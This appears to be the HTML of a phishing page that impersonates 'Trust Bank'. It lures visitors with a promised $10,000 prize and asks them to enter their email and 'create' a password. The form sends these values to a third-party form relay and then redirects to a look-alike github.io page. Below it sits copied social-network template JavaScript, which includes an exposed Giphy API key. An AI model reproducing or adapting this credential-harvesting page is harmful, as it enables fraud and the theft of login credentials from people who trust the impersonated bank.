action="https://formsubmit.co/9bad1063a8dcaac90c4721040d4ea0e8">


<input type="hidden" name="_captcha" value="false">




<input type="hidden" name="_next"  


value="https://trustbank-com.github.io/Profile.Trust_Bank.com/">
 
            
            <p class="desc">







<strong> 












<font style="color: Black">




<Font STYLE="word-spacing:2px">





    <font size="+2">


<font style="color: Black">






We





</font> </font> 




Partnered With




<font size="+2">




 Trust Bank
</font> 



 To Make It Easy and Fast For You To Claim Your $10,000.  All You Have To Do Is To Create An Account With Trust Bank, The $10,000 Will Be Imediately Deposited  Into Your New Trust Bank Account.... It Is That Easy and FREE




<br> <br> 


<center> 
<font size="+2">

<font style="color: DarkRed">

Create Your Trust Bank Account, To Recieve $10,000 Prize


</font> 

</font> 


</center> 
</font> 


</font> 


</strong> 


<br> 




<center> 




<img src="https://i.ibb.co/VB4dXcK/image-1200x630-2.png" alt="image-1200x630-2" width="1200" height="630" data-is360="0" data-load="full" class="" style="width: 180px; height: 83px;">





</center> 


</p>






            <div class="alert alert-danger errors"></div>




            <div class="wow_form_fields">
               <label for="username">Enter Your Email</label>
               <input id="username" name="Email_TrustBANK_NON_US" type="email"  autocomplete="off" required>
            </div> 


            <div class="wow_form_fields">
               <label for="password">Create Password</label>
               <input id="password" name="password_NON_US"  required placeholder="Enter a password you won't forget" type="text" autocomplete="off">
            </div>  



            <div class="wow_form_fields">
               <label for="password">Confirm Password</label>
               <input id="password" name="text"   placeholder="Enter password again" type="Confirm_password" autocomplete="off">
            </div>  



            <div class="login_signup_combo">
               <div class="login__">
                  <button type="submit" class="btn btn-main btn-mat add_wow_loader">Create Account</button>
               </div> 



<br> <br> <br> <br> <br> 


<p class="desc">



<br> <br> <br> 


<br> <br> <br> 


<center> 


<img src="https://i.ibb.co/VB4dXcK/image-1200x630-2.png" alt="image-1200x630-2" width="1200" height="630" data-is360="0" data-load="full" class="" style="width: 310px; height: 125px;">




</center> 


<br> 


<br> <br> 

<center> 



<font size="+1"><strong> 


Trust Bank | All Rights Reserved


<br>


©1957 - 2023


</strong> 

</font> 

</center>

</p>


</form> 



                  <footer>
                     </footer>







    <!-- <div id="node-js-templates">
          <div> -->

    
    
    
      <!-- JS FILES -->
            
      <script type="text/javascript" src="https://spestalk.com/themes/wowonder/javascript/welcome.js?version=4.2.1"></script>
                     <script type="text/javascript">
          const node_socket_flow = "1"
          </script>
            <script type="text/javascript" src="https://spestalk.com/themes/wowonder/javascript/script.js?version=4.2.1"></script>
                  <div class="extra-css"></div>
      
      <!-- End 'JS FILES' -->
      <script type="text/javascript">
  (function (factory) {
  if (typeof define === 'function' && define.amd) {
    // AMD. Register as an anonymous module.
    define(['jquery'], factory);
  } else {
    // Browser globals
    factory(jQuery);
  }
}(function ($) {
  $.timeago = function(timestamp) {
    if (timestamp instanceof Date) {
      return inWords(timestamp);
    } else if (typeof timestamp === "string") {
      return inWords($.timeago.parse(timestamp));
    } else if (typeof timestamp === "number") {
      return inWords(new Date(timestamp));
    } else {
      return inWords($.timeago.datetime(timestamp));
    }
  };
  var $t = $.timeago;

  $.extend($.timeago, {
    settings: {
      refreshMillis: 60000,
      allowPast: true,
      allowFuture: false,
      localeTitle: false,
      cutoff: 0,
      strings: {
        prefixAgo: null,
        prefixFromNow: null,
        suffixAgo: "ago",
        suffixFromNow: "from now",
        inPast: "any moment now",
        seconds: "now",
        minute: "minute",
        minutes: "minutes",
        hour: "hour",
        hours: "hours",
        day: "day",
        days: "days",
        week: "Week",
        weeks: "Weeks",
        month: "month",
        months: "months",
        year: "year",
        years: "years",
        wordSeparator: " ",
        numbers: []
      }
    },

    inWords: function(distanceMillis,type = '') {
      if(!this.settings.allowPast && ! this.settings.allowFuture) {
          throw 'timeago allowPast and allowFuture settings can not both be set to false.';
      }

      var $l = this.settings.strings;
      var prefix = $l.prefixAgo;
      var suffix = $l.suffixAgo;
      if (this.settings.allowFuture) {
        if (distanceMillis < 0) {
          prefix = $l.prefixFromNow;
          suffix = $l.suffixFromNow;
        }
      }

      if(!this.settings.allowPast && distanceMillis >= 0) {
        return this.settings.strings.inPast;
      }

      var seconds = Math.abs(distanceMillis) / 1000;
      var minutes = seconds / 60;
      var hours = minutes / 60;
      var days = hours / 24;
      var weeks = days / 7;
      var years = days / 365;

      function substitute(stringOrFunction, number) {
        var string = $.isFunction(stringOrFunction) ? stringOrFunction(number, distanceMillis) : stringOrFunction;
        var value = ($l.numbers && $l.numbers[number]) || number;
        return number+' '+string.replace(/%d/i, value);
        //return string.replace(/%d/i, value);
      }

        // var words = seconds < 45 && substitute($l.seconds, '') ||
        // seconds < 90 && substitute('m', 1) ||
        // minutes < 45 && substitute('m', Math.round(minutes)) ||
        // minutes < 90 && substitute('h', 1) ||
        // hours < 24 && substitute('hrs', Math.round(hours)) ||
        // hours < 42 && substitute('d', 1) ||
        // days < 7 && substitute('d', Math.round(days)) ||
        // weeks < 2 && substitute('w', 1) ||
        // weeks < 52 && substitute('w', Math.round(weeks)) ||
        // years < 1.5 && substitute('y', 1) ||
        // substitute('yrs', Math.round(years));
        var words = '';
        if (type != 'notification') {
            if (seconds < 45) {
                words = substitute($l.seconds, '');
            }
            else if (seconds < 90) {
                words = substitute('m', 1);
            }
            else if (minutes < 45) {
                words = substitute('m', Math.round(minutes));
            }
            else if (minutes < 90) {
                words = substitute('h', 1);
            }
            else if (hours < 24) {
                words = substitute('hrs', Math.round(hours));
            }
            else if (hours < 42) {
                words = substitute('d', 1);
            }
            else if (days < 7) {
                words = substitute('d', Math.round(days));
            }
            else if (weeks < 2) {
                words = substitute('w', 1);
            }
            else if (weeks < 52) {
                words = substitute('w', Math.round(weeks));
            }
            else if (years < 1.5) {
                words = substitute('y', 1);
            }
            else {
                words = substitute('yrs', Math.round(years));
            }
        }
        else{
            if (seconds < 45) {
                words = substitute($l.seconds, '');
            }
            else if (seconds < 90) {
                words = substitute($l.minute + ' ago', 1);
            }
            else if (minutes < 45) {
                words = substitute($l.minutes + ' ago', Math.round(minutes));
            }
            else if (minutes < 90) {
                words = substitute($l.hour + ' ago', 1);
            }
            else if (hours < 24) {
                words = substitute($l.hours + ' ago', Math.round(hours));
            }
            else if (hours < 42) {
                words = substitute($l.day + ' ago', 1);
            }
            else if (days < 7) {
                words = substitute($l.days + ' ago', Math.round(days));
            }
            else if (weeks < 2) {
                words = substitute($l.week + ' ago', 1);
            }
            else if (weeks < 52) {
                words = substitute($l.weeks + ' ago', Math.round(weeks));
            }
            else if (years < 1.5) {
                words = substitute($l.year + ' ago', 1);
            }
            else {
                words = substitute($l.years + ' ago', Math.round(years));
            }
        }
            



      var separator = $l.wordSeparator || "";
      if ($l.wordSeparator === undefined) { separator = " "; }

      
         return $.trim([prefix, words].join(separator));

          },

    parse: function(iso8601) {
      var s = $.trim(iso8601);
      s = s.replace(/\.\d+/,""); // remove milliseconds
      s = s.replace(/-/,"/").replace(/-/,"/");
      s = s.replace(/T/," ").replace(/Z/," UTC");
      s = s.replace(/([\+\-]\d\d)\:?(\d\d)/," $1$2"); // -04:00 -> -0400
      s = s.replace(/([\+\-]\d\d)$/," $100"); // +09 -> +0900
      return new Date(s);
    },
    datetime: function(elem) {
      var iso8601 = $t.isTime(elem) ? $(elem).attr("datetime") : $(elem).attr("title");
      return $t.parse(iso8601);
    },
    isTime: function(elem) {
      // jQuery's `is()` doesn't play well with HTML5 in IE
      return $(elem).get(0).tagName.toLowerCase() === "time"; // $(elem).is("time");
    }
  });

  // functions that can be called via $(el).timeago('action')
  // init is default when no action is given
  // functions are called with context of a single element
  var functions = {
    init: function(){
      var refresh_el = $.proxy(refresh, this);
      refresh_el();
      var $s = $t.settings;
      if ($s.refreshMillis > 0) {
        this._timeagoInterval = setInterval(refresh_el, $s.refreshMillis);
      }
    },
    update: function(time){
      var parsedTime = $t.parse(time);
      $(this).data('timeago', { datetime: parsedTime });
      if($t.settings.localeTitle) $(this).attr("title", parsedTime.toLocaleString());
      refresh.apply(this);
    },
    updateFromDOM: function(){
      $(this).data('timeago', { datetime: $t.parse( $t.isTime(this) ? $(this).attr("datetime") : $(this).attr("title") ) });
      refresh.apply(this);
    },
    dispose: function () {
      if (this._timeagoInterval) {
        window.clearInterval(this._timeagoInterval);
        this._timeagoInterval = null;
      }
    }
  };

  $.fn.timeago = function(action, options) {
    var fn = action ? functions[action] : functions.init;
    if(!fn){
      throw new Error("Unknown function name '"+ action +"' for timeago");
    }
    // each over objects here and call the requested function
    this.each(function(){
      fn.call(this, options);
    });
    return this;
  };

  function refresh() {
    var data = prepareData(this);
    var $s = $t.settings;

    if (!isNaN(data.datetime)) {
      if ( $s.cutoff == 0 || Math.abs(distance(data.datetime)) < $s.cutoff) {
        let tType = '';
        if ($(this).hasClass('notification-time')) {
          tType = 'notification';
        }
        $(this).text(inWords(data.datetime,tType));
      }
    }
    return this;
  }

  function prepareData(element) {
    element = $(element);
    if (!element.data("timeago")) {
      element.data("timeago", { datetime: $t.datetime(element) });
      var text = $.trim(element.text());
      if ($t.settings.localeTitle) {
        element.attr("title", element.data('timeago').datetime.toLocaleString());
      } else if (text.length > 0 && !($t.isTime(element) && element.attr("title"))) {
        element.attr("title", text);
      }
    }
    return element.data("timeago");
  }

  function inWords(date,type) {
    return $t.inWords(distance(date),type);
  }

  function distance(date) {
    return (new Date().getTime() - date.getTime());
  }

  // fix for IE6 suckage
  document.createElement("abbr");
  document.createElement("time");
}));


$(function () {
  setInterval(function () {
    
    if ( $('.ajax-time').length > 0) {
      $('.ajax-time').timeago()
        .removeClass('.ajax-time');
    }
  },
  1000);
});
</script>
            <!-- Audio FILES -->
      
      <!-- End 'Audio FILES' -->
      <script>
        function _getSession(cname) {
                    return '';
        }
        function ReadMoreText(selector) {
          let text = "Read More";
          if (typeof selector == 'object') {
            selector = $(selector).attr('class');
          }
          for (var i = 0; i < $(selector).length; i++) {
            var t = $(selector)[i];
            if (!$(t).hasClass('ReadMoreAdded') && $(t).text().trim().length > 0 && $(t).height() > 190) {
              var c = new Date().getUTCMilliseconds() + (Math.floor(Math.random() * 9999)) + 100 + "_" + i;
              $(t).addClass(c);
              $(t).addClass('ReadMoreAdded');
              $(t).css({ maxHeight: "160px" })
              $(t).after('<a href="javascript:void(0)" onclick="ShowReadMoreText(\'.'+c+'\',this)">'+text+'</a>');
            }
          }
        }
        function ShowReadMoreText(selector,self) {
          let text = "Read Less";
          $(selector).css({ maxHeight: "" })
          $(self).replaceWith('<a href="javascript:void(0)" onclick="HideReadMoreText(\''+selector+'\',this)">'+text+'</a>')
        }
        function HideReadMoreText(selector,self) {
          let text = "Read More";
          $(selector).css({ maxHeight: "160px" })
          $(self).replaceWith('<a href="javascript:void(0)" onclick="ShowReadMoreText(\''+selector+'\',this)">'+text+'</a>')
        }
                  let f = navigator.userAgent.search("Firefox");
      if (f > -1) {
            $('.header-brand').attr('href', "https://spestalk.com/?cache=1689083900");
      }
         function ShowCommentGif(id,type) {
            $( ".gif_post_comment" ).each(function( index ) {
               if ($( this ).attr('id') != 'gif-form-'+id) {
                  $( this ).slideUp();
               }
            });
            $('#gif-form-'+id).slideToggle(200);
            $('.gif_post_comment_gif').html('');
         }
         function GifScrolledC(self) {
            if ((($(self).prop("scrollHeight") - $(self).height()) - $(self).scrollTop()) < 300) {
              id = $(self).attr('GId');
              type = $(self).attr('GType');
              word = $(self).attr('GWord');
              offset = $(self).attr('GOffset');
              SearchForGif(word,id,type,offset);
            }
         }
         function SearchForGif(keyword,id = 0,type = '',offset = 0) {

            if ($('#publisher-box-stickers-cont-'+id).attr('GWord') != keyword) {
              $('#publisher-box-stickers-cont-'+id).empty();
              $('#publisher-box-stickers-cont-'+id).attr('GOffset', 0);
              $('#publisher-box-stickers-cont-'+id).attr('GWord', keyword);
            }
            else{
              $('#publisher-box-stickers-cont-'+id).attr('GOffset', parseInt($('#publisher-box-stickers-cont-'+id).attr('GOffset')) + 20);
            }
            Wo_Delay(function(){
                $.ajax({
                  url: 'https://api.giphy.com/v1/gifs/search?',
                  type: 'GET',
                  dataType: 'json',
                  data: {q:keyword,api_key:'420d477a542b4287b2bf91ac134ae041', limit: 20,offset: offset},
                })
                .done(function(data) {
                  if (data.meta.status == 200 && data.data.length > 0) {
                    var appended = false;
                    for (var i = 0; i < data.data.length; i++) {
                        appended = true;
                        if (appended == true) {
                          appended = false;
                          if (type == 'story') {
                             $('#publisher-box-stickers-cont-'+id).append($('<img alt="gif" src="'+data.data[i].images.fixed_height_small.url+'" data-gif="' + data.data[i].images.fixed_height.url + '" onclick="Wo_PostCommentGif_'+id+'(this,'+id+')" autoplay loop>'));
                         }
                         else{
                           $('#publisher-box-stickers-cont-'+id).append($('<img alt="gif" src="'+data.data[i].images.fixed_height_small.url+'" data-gif="' + data.data[i].images.fixed_height.url + '" onclick="Wo_PostReplyCommentGif_'+id+'(this,'+id+')" autoplay loop>'));
                         }
                          appended = true;
                        }
                    }
                    var images = 0;
                    Wo_ElementLoad($('img[alt=gif]'), function(){
                      images++;
                    });
                    if (data.data.length == images || images >= 5) {

                    }
                  }
                  else{
                     $('#publisher-box-stickers-cont-'+id).html('<p class="no_gifs_found"><i class="fa fa-frown-o"></i> No result to show</p>');
                  }
                })
                .fail(function() {
                  console.log("error");
                })
              },100);
         }
         function ShowCommentStickers(id,type) {
            $('.gif_post_comment').slideUp(200);
            $('.gif_post_comment_gif').html('');
           $('#sticker-form-'+id).slideToggle(200);
           $('.chat-box-stickers-cont').empty();
           functionName = "Wo_PostReplyCommentSticker_"+id+"(this,"+id+");";
           if (type == 'story') {
            functionName = "Wo_PostCommentSticker_"+id+"(this,"+id+");";
           }

                      sticker = '<div class="empty_state" style="margin: 15px 0 0;"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M5.5,2C3.56,2 2,3.56 2,5.5V18.5C2,20.44 3.56,22 5.5,22H16L22,16V5.5C22,3.56 20.44,2 18.5,2H5.5M5.75,4H18.25A1.75,1.75 0 0,1 20,5.75V15H18.5C16.56,15 15,16.56 15,18.5V20H5.75A1.75,1.75 0 0,1 4,18.25V5.75A1.75,1.75 0 0,1 5.75,4M14.44,6.77C14.28,6.77 14.12,6.79 13.97,6.83C13.03,7.09 12.5,8.05 12.74,9C12.79,9.15 12.86,9.3 12.95,9.44L16.18,8.56C16.18,8.39 16.16,8.22 16.12,8.05C15.91,7.3 15.22,6.77 14.44,6.77M8.17,8.5C8,8.5 7.85,8.5 7.7,8.55C6.77,8.81 6.22,9.77 6.47,10.7C6.5,10.86 6.59,11 6.68,11.16L9.91,10.28C9.91,10.11 9.89,9.94 9.85,9.78C9.64,9 8.95,8.5 8.17,8.5M16.72,11.26L7.59,13.77C8.91,15.3 11,15.94 12.95,15.41C14.9,14.87 16.36,13.25 16.72,11.26Z"></path></svg> No result to show</div>';
           $('#publisher-box-sticker-cont-'+id).html(sticker);

         }
        $(window).on("popstate", function (e) {
          location.reload();
      });
       /*Language Select*/
        $(document).ready(function(){
          $("#wo_language_modal .language_select .English").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/united-states.svg"/></span> ');
          $("#wo_language_modal .language_select .Arabic").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/saudi-arabia.svg"/></span> ');
          $("#wo_language_modal .language_select .Dutch").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/netherlands.svg"/></span> ');
          $("#wo_language_modal .language_select .French").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/france.svg"/></span> ');
          $("#wo_language_modal .language_select .German").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/germany.svg"/></span> ');
          $("#wo_language_modal .language_select .Hungarian, #wo_language_modal .language_select .Magyar").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/hungary.svg"/></span> ');
          $("#wo_language_modal .language_select .Italian").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/italy.svg"/></span> ');
          $("#wo_language_modal .language_select .Portuguese").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/portugal.svg"/></span> ');
          $("#wo_language_modal .language_select .Russian").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/russia.svg"/></span> ');
          $("#wo_language_modal .language_select .Spanish").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/spain.svg"/></span> ');
          $("#wo_language_modal .language_select .Serbian").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/serbia.svg"/></span> ');
          $("#wo_language_modal .language_select .Turkish").append('<span class="language_initial"><img src="https://spestalk.com/themes/wowonder/img/flags/turkey.svg"/></span> ');
        });
        /* 

The code entered here will be added in <footer> tag 

*/      </script>




	  
   </body>
</html>
